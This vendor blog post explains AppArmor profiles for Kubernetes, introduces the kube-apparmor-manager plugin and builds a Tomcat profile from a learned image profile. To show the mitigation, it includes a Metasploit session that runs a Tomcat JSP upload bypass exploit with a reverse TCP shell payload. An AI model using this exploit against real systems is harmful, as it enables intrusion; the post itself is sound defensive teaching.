AppArmor is a Linux kernel security module that supplements the standard Linux user and group-based permissions to confine programs to a limited set of resources.

AppArmor can be configured for any application to reduce its potential attack surface and provide greater defense in depth. You configure it through profiles, which you tune to whitelist only the access a specific program or container needs: Linux capabilities, network access, file permissions, and so on.

In this blog, we will first give a quick example of an AppArmor profile and show how a Kubernetes workload can use it to reduce its attack surface. Then we will introduce a new open source tool, kube-apparmor-manager, and show how it helps you manage AppArmor profiles within a Kubernetes cluster. Last but not least, we will demonstrate how to build an AppArmor profile from an image profile to prevent a reverse shell attack.

An introduction to AppArmor Profiles

An AppArmor profile defines which resources on the system (like network, system capabilities, or files) the confined application can access.

Here’s an example of a simple AppArmor profile:

profile k8s-apparmor-example-deny-write flags=(attach_disconnected) {
  file,
  # Deny all file writes.
  deny /** w,
}

In this example, the profile grants the application all kinds of access, except write to the entire file system. It contains two rules:

- file: Allows all kinds of access to the entire file system.

- deny /** w: Denies any file write under the root directory (/). The expression /** translates to any file under the root directory, as well as those under its subdirectories.
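To make the difference between /* and /** concrete, here is a minimal Python sketch that translates a simplified subset of AppArmor path globs into regular expressions. It is an illustration only, not AppArmor's own matcher: the helper names glob_to_regex and matches are hypothetical, and character classes and {a,b} alternations are deliberately left out.

```python
import re


def glob_to_regex(pattern: str) -> re.Pattern:
    """Translate a simplified AppArmor path glob into a compiled regex.

    Only `**`, `*`, and `?` are handled in this sketch.
    """
    parts = []
    i = 0
    while i < len(pattern):
        if pattern.startswith("**", i):
            parts.append(".*")      # ** may cross directory boundaries
            i += 2
        elif pattern[i] == "*":
            parts.append("[^/]*")   # * stays inside one path component
            i += 1
        elif pattern[i] == "?":
            parts.append("[^/]")    # ? is one character other than /
            i += 1
        else:
            parts.append(re.escape(pattern[i]))
            i += 1
    return re.compile("".join(parts))


def matches(pattern: str, path: str) -> bool:
    """Return True when the whole path is covered by the glob."""
    return glob_to_regex(pattern).fullmatch(path) is not None


if __name__ == "__main__":
    for pattern, path in [("/**", "/tmp/test"), ("/tmp/*", "/tmp/a/b")]:
        print(pattern, path, matches(pattern, path))
```

With this reading, /** covers /tmp/test and anything nested deeper, while /tmp/* stops at the first directory level.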

To set up a Kubernetes cluster so containers can use AppArmor profiles, follow these steps:

- Install and enable AppArmor on all of the cluster nodes.

- Copy the AppArmor profile you want to use to every node, and load it in either enforce mode or complain mode.

- Annotate the container workload with the AppArmor profile name.

Here is how you would use a profile in a Pod:

apiVersion: v1
kind: Pod
metadata:
  name: hello-apparmor
  annotations:
    # Tell Kubernetes to apply the AppArmor profile "k8s-apparmor-example-deny-write".
    container.apparmor.security.beta.kubernetes.io/hello: localhost/k8s-apparmor-example-deny-write
spec:
  containers:
  - name: hello
    image: busybox
    command: [ "sh", "-c", "echo 'Hello AppArmor!' && sleep 1h" ]

In the Pod YAML above, the container named hello uses the AppArmor profile named k8s-apparmor-example-deny-write. If the AppArmor profile does not exist on the node, the pod will fail to be created.
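The annotation follows a fixed pattern: the key ends with the container name, and the value is the profile name prefixed with localhost/. As a rough sketch, assuming the Pod manifest has already been loaded into a Python dict, a helper could add it like this (annotate_pod is a hypothetical name, not part of Kubernetes or any client library):

```python
ANNOTATION_PREFIX = "container.apparmor.security.beta.kubernetes.io/"


def annotate_pod(pod: dict, container: str, profile: str) -> dict:
    """Attach a node-local AppArmor profile to one container of a Pod manifest."""
    names = [c["name"] for c in pod["spec"]["containers"]]
    if container not in names:
        raise ValueError(f"container {container!r} is not defined in the Pod spec")
    annotations = pod.setdefault("metadata", {}).setdefault("annotations", {})
    # "localhost/" refers to a profile that is already loaded on the node.
    annotations[ANNOTATION_PREFIX + container] = f"localhost/{profile}"
    return pod


if __name__ == "__main__":
    pod = {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {"name": "hello-apparmor"},
        "spec": {"containers": [{"name": "hello", "image": "busybox"}]},
    }
    annotate_pod(pod, "hello", "k8s-apparmor-example-deny-write")
    print(pod["metadata"]["annotations"])
```

Checking the container name up front catches a typo in the annotation key before the manifest is submitted.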

Each profile can run in either enforce mode, which blocks access to disallowed resources, or complain mode, which only reports violations. After building an AppArmor profile, it is good practice to apply it in complain mode first and let the workload run for a while. By analyzing the AppArmor log, you can detect and fix any false positives. Once you are confident in the profile, you can switch it to enforce mode.

If the previous profile runs in enforce mode, it will block any file write activities:

$ kubectl exec hello-apparmor touch /tmp/test
touch: /tmp/test: Permission denied
error: error executing remote command: command terminated with non-zero exit code: Error executing in Docker Container:

This was a simplified example. Now, think of the challenges of implementing AppArmor in production.

First, you will have to build robust profiles for each of your containers to prevent attacks without blocking daily tasks.

Then, you will have to manage several profiles across all the nodes in your cluster.

We’ll cover how kube-apparmor-manager can help with the managing part, and how the image profiling feature in Sysdig Secure can help build those profiles.

Kube-apparmor-manager

There are some tools, like apparmor-loader, that help manage AppArmor profiles in Kubernetes clusters. Apparmor-loader runs as a privileged daemonset, polls a configmap containing the AppArmor profiles, and loads the profiles in either enforce mode or complain mode. However, this introduces a privileged workload, which is far from ideal. That's why we came up with an alternative approach.

The kube-apparmor-manager approach is different:

- It represents the profiles as Kubernetes objects using a Custom Resource Definition (apparmorprofiles.crd.security.sysdig.com).

- A kubectl plugin translates AppArmorProfile objects, stored in etcd, into the actual AppArmor profiles, and synchronizes them between the nodes.

Let’s see how they work in detail.

The AppArmorProfile Custom Resource Definition

The AppArmorProfile CRD defines a schema to represent an AppArmor profile as a Kubernetes object.

This is what our example AppArmor profile would look like in this format:

apiVersion: crd.security.sysdig.com/v1alpha1
kind: AppArmorProfile
metadata:
  name: k8s-apparmor-example-deny-write
spec:
  # Add fields here
  enforced: true
  rules: |
    # read only file paths
    file,
    deny /** w,

The enforced field dictates whether the profile is in enforce or complain mode. The rules field contains the AppArmor profile body, that is, the list of whitelist or blacklist rules.
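To illustrate how these two fields could map onto a profile file, here is a minimal Python sketch that renders an AppArmorProfile object (as a dict) into profile text. This is not the plugin's actual implementation. It assumes that enforced: false corresponds to AppArmor's complain profile flag and that attach_disconnected is always set, as in the earlier example. The function name render_profile is hypothetical.

```python
import textwrap


def render_profile(obj: dict) -> str:
    """Render an AppArmorProfile-style dict into AppArmor profile text."""
    name = obj["metadata"]["name"]
    spec = obj["spec"]
    flags = ["attach_disconnected"]
    # Assumption: a non-enforced profile is loaded with the complain flag.
    if not spec.get("enforced", False):
        flags.append("complain")
    body = textwrap.indent(textwrap.dedent(spec["rules"]).strip(), "  ")
    return f"profile {name} flags=({','.join(flags)}) {{\n{body}\n}}\n"


if __name__ == "__main__":
    deny_write = {
        "metadata": {"name": "k8s-apparmor-example-deny-write"},
        "spec": {"enforced": True, "rules": "file,\ndeny /** w,\n"},
    }
    print(render_profile(deny_write))
```

Keeping the mode in a separate boolean field means the same rules can be promoted from complain to enforce without touching the rule body.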

Note that this is a cluster-level object.

The Apparmor-manager plugin

Once the CRD is installed in the Kubernetes cluster, you can start interacting with AppArmorProfile objects using kubectl. However, you still need to translate the content from the AppArmorProfile objects into the actual AppArmor profiles, and distribute them to all the nodes.

This is what apparmor-manager, a kubectl plugin, does.

You can install it using krew:

$ kubectl krew install apparmor-manager

As apparmor-manager communicates with the worker nodes via SSH, you will need to set some environment variables:

- SSH_USERNAME: SSH username to access worker nodes. Defaults to admin.

- SSH_PERM_FILE: SSH private key to access worker nodes. Defaults to $HOME/.ssh/id_rsa.

- SSH_PASSPHRASE: SSH passphrase (only applicable if the private key is passphrase protected).
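As an illustration of how these variables and their defaults fit together, the following Python sketch resolves them from an environment mapping. The variable names and defaults come from the list above. The SSHConfig class and load_ssh_config function are hypothetical and are not taken from the plugin's source.

```python
import os
from dataclasses import dataclass
from typing import Mapping, Optional


@dataclass
class SSHConfig:
    username: str
    key_file: str
    passphrase: Optional[str]


def load_ssh_config(env: Mapping[str, str] = os.environ) -> SSHConfig:
    """Resolve SSH settings, falling back to the documented defaults."""
    home = env.get("HOME", os.path.expanduser("~"))
    return SSHConfig(
        username=env.get("SSH_USERNAME", "admin"),
        key_file=env.get("SSH_PERM_FILE", f"{home}/.ssh/id_rsa"),
        # An unset or empty passphrase means the key is not protected.
        passphrase=env.get("SSH_PASSPHRASE") or None,
    )


if __name__ == "__main__":
    print(load_ssh_config({"HOME": "/home/alice", "SSH_USERNAME": "ubuntu"}))
```

Passing the environment as a parameter keeps the function easy to exercise without modifying the real process environment.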

If AppArmor is not installed on the nodes, apparmor-manager can help you enable AppArmor on worker nodes with the following command:

$ kubectl apparmor-manager init

The init command will also install the CRD for you.

Once everything is configured, you can check the status of AppArmor on the nodes with:

$ kubectl apparmor-manager status
+-------------------------------+---------------+----------------+--------+------------------+
| NODE NAME                     | INTERNAL IP   | EXTERNAL IP    | ROLE   | APPARMOR ENABLED |
+-------------------------------+---------------+----------------+--------+------------------+
| ip-172-20-45-132.ec2.internal | 172.20.45.132 | 54.91.xxx.xx   | master | false            |
| ip-172-20-54-2.ec2.internal   | 172.20.54.2   | 54.82.xx.xx    | node   | true             |
| ip-172-20-58-7.ec2.internal   | 172.20.58.7   | 18.212.xxx.xxx | node   | true             |
+-------------------------------+---------------+----------------+--------+------------------+

You can also create your first AppArmorProfile object with kubectl:

$ kubectl apply -f deny-write.yaml
apparmorprofile.crd.security.sysdig.com/k8s-apparmor-example-deny-write created
$ kubectl get aap
NAME                              AGE
k8s-apparmor-example-deny-write   5s

Once created, you’ll want to synchronize the AppArmorProfiles to the worker nodes:

$ kubectl apparmor-manager enforced
+-------------------------------+--------+---------------------------------------------------------------+
| NODE NAME                     | ROLE   | ENFORCED PROFILES                                             |
+-------------------------------+--------+---------------------------------------------------------------+
| ip-172-20-48-62.ec2.internal  | node   | /usr/sbin/ntpd,docker-default,k8s-apparmor-example-deny-write |
| ip-172-20-77-231.ec2.internal | node   | /usr/sbin/ntpd,docker-default,k8s-apparmor-example-deny-write |
| ip-172-20-80-19.ec2.internal  | master |                                                               |
| ip-172-20-97-60.ec2.internal  | node   | /usr/sbin/ntpd,docker-default,k8s-apparmor-example-deny-write |
+-------------------------------+--------+---------------------------------------------------------------+

The k8s-apparmor-example-deny-write profile is the one we just created and synced, while the other two are installed by default with AppArmor.

The last step would be to configure a Pod to use this profile, using annotations as we saw earlier.

Next, let’s talk about how to build a robust AppArmor profile using Sysdig Secure.

Build a robust AppArmor Profile using Sysdig Secure

With Image profiling, Sysdig Secure will profile a container for 24 hours, learning what processes, file system activity, networking behavior, and system calls are to be expected. With this knowledge you can generate a learned image profile, and use it to create runtime policies that can protect containers against abnormal behaviour in production.

We recently covered what a reverse shell attack is, and we used a tomcat image to create policies based on image profiling to detect such attacks.

Let’s now see how to create an AppArmor profile out of a learned image profile.



First, let’s remember what the tomcat image profile looked like:

The profile was built for the Tomcat image, covering network connections, file activities, processes, and syscalls. Here are some details about the profile:

- Processes running inside the Tomcat container are: bash, dirname, java, tty, and uname.

- The listening port is 8080.

- There are no outgoing network connections.

- A number of files are opened for read and write, including index_jsp.class, index_jsp.java, index_jsp.classtmp, log files, and some system files as well.

- Finally, 43 different syscalls were recorded.

When creating our AppArmor policy:

- As tomcat is only listening on the 8080 port, we don’t need extra configuration.

- Based on the detected processes, no extra admin capabilities are needed.

- We should go through the file activity list (including process launches) and create rules for each entry.

Our AppArmor profile would look like this:

apiVersion: crd.security.sysdig.com/v1alpha1
kind: AppArmorProfile
metadata:
  name: tomcat
spec:
  # Add fields here
  enforced: false
  rules: |
    # read only file paths
    allow /etc/** r,
    allow /dev/** r,
    allow /usr/lib/** mr,
    allow /usr/local/** mr,
    allow /lib/x86_64-linux-gnu/** mr,
    allow /sys/devices/system/cpu/** r,
    allow /sys/devices/system/cpu/ r,
    allow /sys/kernel/mm/* r,
    allow /usr/share/java/** r,
    allow /var/lib/docker/overlay2/*/diff/** r,
    allow /usr/share/zoneinfo/UTC r,
    # allow read write file paths
    allow /tmp/* rw,
    allow /proc/* rw,
    allow /dev/null rw,
    allow /dev/tty rw,
    allow /usr/local/tomcat/** rw,
    allow /lib/x86_64-linux-gnu/* rw,
    # allow only a few commands
    allow /usr/bin/dirname mrix,
    allow /bin/uname mrix,
    allow /**/java mrix,
    allow /usr/bin/tty mrix,
    allow /usr/bin/env mrix,
    allow /bin/bash mrix,
    allow /usr/local/tomcat/bin/* mrix,

It allows reads on only a few file paths, read/write on even fewer file paths, and execution of only a few commands.
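The three rule groups in this profile lend themselves to being generated from the lists in a learned image profile. The following Python sketch shows one way that could look. It is a simplification under stated assumptions: the build_rules helper is hypothetical, the input lists are supplied by hand rather than exported from Sysdig Secure, and every read-only path gets plain r access (the profile above also uses mr for library paths).

```python
from typing import Iterable


def build_rules(read_only: Iterable[str],
                read_write: Iterable[str],
                executables: Iterable[str]) -> str:
    """Turn observed file and process activity into AppArmor allow rules."""
    lines = ["# read only file paths"]
    lines += [f"allow {path} r," for path in read_only]
    lines.append("# allow read write file paths")
    lines += [f"allow {path} rw," for path in read_write]
    lines.append("# allow only a few commands")
    # mrix: memory-map, read, and execute while staying in this profile.
    lines += [f"allow {path} mrix," for path in executables]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(build_rules(
        read_only=["/etc/**", "/usr/share/java/**"],
        read_write=["/tmp/*", "/usr/local/tomcat/**"],
        executables=["/bin/bash", "/usr/bin/dirname"],
    ))
```

Anything that never showed up during profiling, such as /bin/dash, simply gets no rule and is therefore denied once the profile is enforced.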

Let’s launch a reverse shell attack with metasploit and see what happens without applying an AppArmor profile to the tomcat container:

resource (tomcat.rc)> use exploit/multi/http/tomcat_jsp_upload_bypass
resource (tomcat.rc)> set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
resource (tomcat.rc)> set TARGETURI /
TARGETURI => /
resource (tomcat.rc)> run
[*] Started reverse TCP handler on 100.127.61.193:45521
[*] Uploading payload…
[*] Payload executed!
[*] Command shell session 1 opened (100.127.61.193:45521 -> 100.127.61.196:54460) at 2020-04-15 23:12:03 +0000
ls
LICENSE
NOTICE
RELEASE-NOTES
RUNNING.txt
bin
conf
include
lib
logs
native-jni-lib
temp
webapps
work
pwd
/usr/local/tomcat
exit

The output above shows that a reverse shell connection was established. The ls and pwd commands ran, and their output was returned to the attacker.

Next, let’s apply the AppArmor profile and try again:

resource (tomcat.rc)> use exploit/multi/http/tomcat_jsp_upload_bypass
resource (tomcat.rc)> set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
resource (tomcat.rc)> set TARGETURI /
TARGETURI => /
resource (tomcat.rc)> run
[*] Started reverse TCP handler on 100.127.61.193:45521
[*] Uploading payload…
[*] Command shell session 1 opened (100.127.61.193:45521 -> 100.127.61.197:58878) at 2020-04-15 23:16:44 +0000
[*] Payload executed!
ls
pwd

We may conclude a couple of things from the output above:

The payload is still dropped. This is because the rule allow /usr/local/tomcat/** rw, in the AppArmor profile permits it. We can improve this rule by narrowing it to specific files, so that a malicious payload cannot be written unless it uses one of the whitelisted file names. Of course, a web application firewall could also detect malicious payloads, but that is not the topic here.

There was no output from executing ls and pwd. You might guess this is because these two commands are not in the whitelist of the AppArmor profile, and that is true.

However, if you look at the AppArmor log on the node where the tomcat pod runs, you will find the following:

Apr 15 23:16:44 ip-172-20-48-62 kernel: [20095.177527] audit: type=1400 audit(1586992604.329:50): apparmor="DENIED" operation="open" profile="tomcat" name="/proc/66/fd/" pid=1309 comm="java" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
Apr 15 23:16:44 ip-172-20-48-62 kernel: [20095.725025] audit: type=1400 audit(1586992604.877:51): apparmor="DENIED" operation="exec" profile="tomcat" name="/bin/dash" pid=1309 comm="java" requested_mask="x" denied_mask="x" fsuid=0 ouid=0

The shell itself, /bin/dash, was also blocked from executing. All of the follow-up commands, like ls and pwd, rely on that shell to interact with the victim pod.
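When reviewing many such entries, for example while a profile runs in complain mode, it helps to pull the key=value fields out of each audit line. The following Python sketch does that for the log format shown above. The function names parse_audit_line and denials are hypothetical, and the sketch only assumes that fields appear as key=value or key="value" pairs.

```python
import re
from typing import Dict, Iterable, List

# Matches key="quoted value" or key=bare_value pairs in an audit line.
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_audit_line(line: str) -> Dict[str, str]:
    """Extract the key=value fields of one kernel audit log line."""
    fields = {}
    for match in FIELD.finditer(line):
        key, quoted, bare = match.groups()
        fields[key] = quoted if quoted is not None else bare
    return fields


def denials(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Keep only the entries where AppArmor denied an operation."""
    parsed = (parse_audit_line(line) for line in lines)
    return [entry for entry in parsed if entry.get("apparmor") == "DENIED"]


if __name__ == "__main__":
    sample = (
        'Apr 15 23:16:44 ip-172-20-48-62 kernel: [20095.725025] audit: type=1400 '
        'audit(1586992604.877:51): apparmor="DENIED" operation="exec" '
        'profile="tomcat" name="/bin/dash" pid=1309 comm="java" '
        'requested_mask="x" denied_mask="x" fsuid=0 ouid=0'
    )
    for entry in denials([sample]):
        print(entry["profile"], entry["operation"], entry["name"])
```

Grouping the resulting entries by profile and name gives a quick list of paths to either whitelist or investigate.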

The AppArmor profile successfully mitigated the reverse shell attack!

Conclusion

Once attackers gain access to a system, they can establish a reverse shell in multiple ways.

AppArmor profiles can help reduce the attack surface by confining applications in containers to a smaller set of resources. However, building robust AppArmor profiles and managing them effectively are two challenges Kubernetes administrators face.

Kube-apparmor-manager helps manage AppArmor profiles across the worker nodes via a centralized CRD object.

Knowing your container’s activities is essential to building a robust AppArmor profile that will protect your workload.

Try Sysdig Secure today! And discover how image profiling makes it easier to build your own AppArmor profiles.